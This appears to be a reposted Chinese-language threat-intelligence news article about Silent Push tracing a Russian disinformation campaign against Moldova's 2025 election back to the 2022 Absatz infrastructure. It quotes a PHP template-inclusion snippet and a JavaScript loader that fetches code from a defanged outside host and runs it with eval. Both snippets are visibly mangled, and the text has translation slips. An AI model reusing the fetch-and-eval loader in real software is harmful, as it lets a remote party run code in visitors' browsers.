2025年9月28日摩尔多瓦议会选举前夕,网络安全研究人员发现了一场由俄罗斯支持的复杂虚假信息运动,其目的是削弱公众对摩尔多瓦亲欧洲领导层的信心。
这场活动于2025年4月开始显现,当时分析师首次发现一批新注册的域名发布带有偏见的新闻文章,既有罗马尼亚语的,也有俄语的。
这些网站采用了相同的模板,并与较旧的俄罗斯宣传机构共享基础设施,这表明有人在摩尔多瓦民主进程的关键节点精心策划,试图制造分裂。
Silent Push的分析师通过结合开源情报和网络流量分析识别出了这一活动。
初步迹象包括数十个发布政治评论的网址,这些评论带有煽动性标题,旨在诋毁执政联盟,并扩大要求重新转向莫斯科的呼声。
后续调查显示,这些域名解析到两个专用IP地址,这两个地址此前都曾为2022年一个名为Absatz的虚假信息行动托管过内容。
通过将注册元数据与托管记录相关联,研究人员在新的摩尔多瓦定向攻击行动与早期活动之间建立了明确的关联。
通过深入的技术分析,Silent Push的分析师们指出,这些新网站复用了几个最初为2022年的行动开发的定制功能。
这些功能负责内容生成、自动评论审核以及对社交媒体推荐的隐秘重定向。
重用这段代码不仅加快了部署速度,还提供了独特的标识,使研究人员能够将不同的站点连接起来。
技术痕迹在负责文章模板和URL参数解析的PHP模块中尤为明显,该模块包含以下可识别的代码片段:-
[? php
function renderStory($ storyId) {
$ seed = 'Storm1679';
$ key = substr (md5($ storyId . $ seed), 0, 8);
$ templatePath = "/var /www /html /templates /{$ key}_template[.]php";
include($ templatePath);
}
?]通过对比每个URL中的哈希片段,分析人员能够追踪2022年Absatz基础设施和2025年摩尔多瓦活动中代码库的演变。
规避检测与基础设施持久性
该活动的操作者展示了高级的持续性策略,精心构建其基础设施以规避常规检测。
每个虚假信息网站都使用一组轮换的内容分发网络(CDN)和代理服务来隐藏源IP,当主节点下线时,就切换到硬编码的备用主机。
DNS记录配置了极短的TTL值(通常不到五分钟),这迫使安全团队不断刷新缓存,并使下架工作变得复杂。
在一个案例中,当研究人员在互联网服务提供商层面成功阻断了对一个恶意域名的访问时,该网站通过一个隐蔽的JavaScript加载器自动将访客重定向到了另一个备用域名:
[script]
fetch('https://cdn.cloudproxy[.]net/get?siteId=42')
. then (res =() res[.]text())
. then (code =() eval (code));
[/script]这个加载器从第三方内容分发网络获取了一个经过混淆处理的有效载荷,该有效载荷进而在用户的浏览器中重新生成了虚假信息网站的内容,整个过程并未触及原始域名。
通过利用这种双阶段加载机制,该活动能够避开域名黑名单,继续发布文章,且不会出现明显的中断。
为了维护操作安全,所有用于新内容更新的命令与控制交互均通过使用非标准端口的TLS加密通道进行。
在2022年的Absatz行动中也发现了相同的港口,这进一步巩固了这两项行动之间的联系。
分析师们还指出,社交媒体的传播放大依赖于低质量的机器人账号,这些账号被编程以模仿真实用户的行为,具体方式包括改变发帖时间,以及将政治内容与体育或当地天气等中性话题穿插发布。
随着摩尔多瓦临近投票,这场竞选活动强调了技术合作和实时监控对于保护民主机构免受秘密影响行动干扰的重要性。
Silent Push 继续追踪并缓解 Storm-1679 网络背后不断演变的基础设施,企业客户可获取详细遥测数据,用于 主动防御 措施。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
